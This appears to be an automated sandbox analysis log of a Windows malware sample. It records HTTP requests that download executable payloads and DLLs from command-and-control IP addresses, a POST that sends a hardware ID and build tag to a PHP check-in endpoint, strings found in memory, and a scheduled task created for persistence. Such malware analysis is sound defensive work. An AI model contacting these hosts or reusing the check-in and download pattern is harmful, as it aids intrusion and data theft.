Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ogs.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com

Source: unknown

HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIEGHJJDGHCAKEBGIJKHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 45 47 48 4a 4a 44 47 48 43 41 4b 45 42 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 31 45 32 35 42 39 46 34 41 32 36 39 39 32 39 33 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 45 47 48 4a 4a 44 47 48 43 41 4b 45 42 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 45 47 48 4a 4a 44 47 48 43 41 4b 45 42 47 49 4a 4b 2d 2d 0d 0a Data Ascii: ------HIIEGHJJDGHCAKEBGIJKContent-Disposition: form-data; name="hwid"B61E25B9F4A2699293130------HIIEGHJJDGHCAKEBGIJKContent-Disposition: form-data; name="build"drum------HIIEGHJJDGHCAKEBGIJK--

Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: skotes.exe, 00000014.00000002.2647162838.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/fac00b58987e8e7e7b9ca30804042ba5ce90ui
Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe))
Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe2962001
Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe450
Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe61395d
Source: skotes.exe, 00000014.00000002.2647162838.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe9oX
Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exehp
Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exerlencodedU)
Source: file.exe, 00000000.00000002.1979370069.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1978262092.0000000000777000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1979370069.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743257678.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1979370069.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll-u
Source: file.exe, 00000000.00000002.1979370069.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllOt
Source: file.exe, 00000000.00000002.1979370069.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: file.exe, 00000000.00000002.1979370069.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: file.exe, 00000000.00000002.1979370069.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dllwo
Source: file.exe, 00000000.00000002.1979370069.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllCu
Source: file.exe, 00000000.00000002.1979370069.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllct
Source: file.exe, 00000000.00000002.1979370069.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll)o
Source: file.exe, 00000000.00000002.1979370069.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll:oH
Source: file.exe, 00000000.00000002.1979370069.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743257678.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: file.exe, 00000000.00000002.1979370069.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: file.exe, 00000000.00000002.1979370069.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllX
Source: file.exe, 00000000.00000003.1743257678.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1979370069.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743257678.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.1999524290.00000000233AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php.L
Source: file.exe, 00000000.00000003.1743257678.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: file.exe, 00000000.00000002.1979370069.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php003
Source: file.exe, 00000000.00000003.1608261081.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743257678.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php6
Source: file.exe, 00000000.00000003.1743257678.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpE
Source: file.exe, 00000000.00000003.1743257678.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1979370069.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpG
Source: file.exe, 00000000.00000003.1608261081.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743257678.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpO
Source: file.exe, 00000000.00000002.1999524290.00000000233AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpUE
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpation
Source: file.exe, 00000000.00000002.1978262092.0000000000777000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpc60ab594776c83eaa9bd06ecc7f8
Source: file.exe, 00000000.00000003.1743257678.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phprowser
Source: file.exe, 00000000.00000002.1979370069.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.2060
Source: file.exe, 00000000.00000002.1978262092.0000000000777000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206BFHming
Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php(
Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php4
Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpL8
Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpi
Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpt8
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: chromecache_103.5.dr	String found in binary or memory: http://www.broofa.com
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2008434373.000000006FE3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2005412674.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1996036540.000000001D259000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.1608148634.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, GHDAAKJE.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_103.5.dr	String found in binary or memory: https://apis.google.com
Source: file.exe, 00000000.00000002.1999524290.00000000233A1000.00000004.00000020.00020000.00000000.sdmp, GHDBKFHIJKJKECAAAECA.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: file.exe, 00000000.00000002.1999524290.00000000233A1000.00000004.00000020.00020000.00000000.sdmp, GHDBKFHIJKJKECAAAECA.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: file.exe, 00000000.00000003.1608148634.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, GHDAAKJE.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1608148634.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, GHDAAKJE.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1608148634.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, GHDAAKJE.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1999524290.00000000233A1000.00000004.00000020.00020000.00000000.sdmp, GHDBKFHIJKJKECAAAECA.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: file.exe, 00000000.00000002.1999524290.00000000233A1000.00000004.00000020.00020000.00000000.sdmp, GHDBKFHIJKJKECAAAECA.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.1608148634.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, GHDAAKJE.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1608148634.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, GHDAAKJE.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1608148634.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, GHDAAKJE.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chromecache_103.5.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_103.5.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_103.5.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_103.5.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: GHDBKFHIJKJKECAAAECA.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: chromecache_103.5.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: KFCFBAAEHCFHJJKEHJKJDHJDGI.0.dr	String found in binary or memory: https://support.mozilla.org
Source: KFCFBAAEHCFHJJKEHJKJDHJDGI.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: KFCFBAAEHCFHJJKEHJKJDHJDGI.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: file.exe, 00000000.00000002.1999524290.00000000233A1000.00000004.00000020.00020000.00000000.sdmp, GHDBKFHIJKJKECAAAECA.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.1608148634.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, GHDAAKJE.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chromecache_103.5.dr	String found in binary or memory: https://www.google.com
Source: file.exe, 00000000.00000003.1608148634.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, GHDAAKJE.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_103.5.dr	String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_103.5.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_103.5.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: file.exe, 00000000.00000002.1999524290.00000000233A1000.00000004.00000020.00020000.00000000.sdmp, GHDBKFHIJKJKECAAAECA.0.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: KFCFBAAEHCFHJJKEHJKJDHJDGI.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.1978262092.00000000006DC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: KFCFBAAEHCFHJJKEHJKJDHJDGI.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: file.exe, 00000000.00000002.1978262092.00000000006DC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: KFCFBAAEHCFHJJKEHJKJDHJDGI.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: KFCFBAAEHCFHJJKEHJKJDHJDGI.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.1978262092.00000000006DC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1865919036.0000000023610000.00000004.00000020.00020000.00000000.sdmp, KFCFBAAEHCFHJJKEHJKJDHJDGI.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.8:49741 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: JDGIECGIEB.exe.0.dr	Static PE information: section name:
Source: JDGIECGIEB.exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: skotes.exe.16.dr	Static PE information: section name:
Source: skotes.exe.16.dr	Static PE information: section name: .idata
Source: 931e3b56d4.exe.20.dr	Static PE information: section name:
Source: 931e3b56d4.exe.20.dr	Static PE information: section name: .idata
Source: 931e3b56d4.exe.20.dr	Static PE information: section name:

Creates files inside the system directory

Source: C:\Users\user\Documents\JDGIECGIEB.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB3ECD0	0_2_6CB3ECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CADECC0	0_2_6CADECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBAC30	0_2_6CBBAC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA6C00	0_2_6CBA6C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAEAC60	0_2_6CAEAC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC6CDC0	0_2_6CC6CDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE4DB0	0_2_6CAE4DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB76D90	0_2_6CB76D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC0AD50	0_2_6CC0AD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAED70	0_2_6CBAED70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC68D20	0_2_6CC68D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB66E90	0_2_6CB66E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAEAEC0	0_2_6CAEAEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB80EC0	0_2_6CB80EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC0E20	0_2_6CBC0E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB7EE70	0_2_6CB7EE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAEEFB0	0_2_6CAEEFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBEFF0	0_2_6CBBEFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE0FE0	0_2_6CAE0FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC28FB0	0_2_6CC28FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE6F10	0_2_6CAE6F10
